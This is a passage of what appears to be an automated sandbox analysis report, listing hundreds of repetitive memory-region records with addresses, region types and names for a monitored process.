pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5903 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5904 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5905 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5906 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5907 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5908 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5909 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5910 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5911 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5912 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5913 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5914 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5915 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5916 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5917 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5918 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5919 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5920 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5921 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5922 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5923 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5924 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5925 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5926 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5927 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5928 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5929 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5930 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5931 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5932 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5933 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5934 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5935 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5936 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5937 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5938 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5939 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5940 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5941 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5942 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5943 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5944 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5945 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5946 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5947 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5948 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5949 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5950 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5951 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5952 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5953 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5954 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5955 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5956 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5957 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5958 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5959 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5960 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5961 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5962 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5963 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5964 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5965 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5966 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5967 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5968 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5969 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5970 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5971 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5972 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5973 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 5974 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5975 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5976 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5977 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5978 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5979 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5980 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5981 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5982 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5983 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5984 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5985 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5986 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5987 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5988 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5989 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5990 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5991 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5992 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5993 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5994 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5995 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5996 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5997 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5998 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5999 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6000 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6001 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6002 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6003 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6005 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6006 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6007 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6008 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6009 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6010 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6011 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6012 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6013 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6014 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6015 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6016 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6017 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6018 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6019 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6020 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6021 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6022 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6023 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6024 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6025 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6026 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6027 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6028 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6029 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6030 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6031 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6032 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6033 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6034 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6035 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6036 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6037 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6038 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6039 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6040 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6041 start_va = 0x460000 end_va = 0x461fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6042 start_va = 0x470000 end_va = 0x470fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6043 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6044 start_va = 0x4d0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 6045 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6046 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6047 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6048 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6049 start_va = 0x470000 end_va = 0x470fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6050 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6051 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6052 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6053 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6054 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6055 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6056 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6057 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6058 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6059 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6060 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6061 start_va = 0x470000 end_va = 0x470fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6062 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6063 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6064 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6065 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6066 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6067 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6068 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6069 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6070 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6071 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6072 start_va = 0x470000 end_va = 0x471fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6073 start_va = 0x620000 end_va = 0x621fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 6074 start_va = 0x100d0000 end_va = 0x1014ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000100d0000" filename = "" Region: id = 6075 start_va = 0x10150000 end_va = 0x101cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010150000" filename = "" Region: id = 6076 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6077 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6078 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6079 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6080 start_va = 0x6f0000 end_va = 0x6f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 6081 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6082 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6083 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6084 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6085 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6086 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6087 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6088 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6089 start_va = 0x4d0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 6090 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6091 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6092 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6093 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6094 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6095 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6096 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 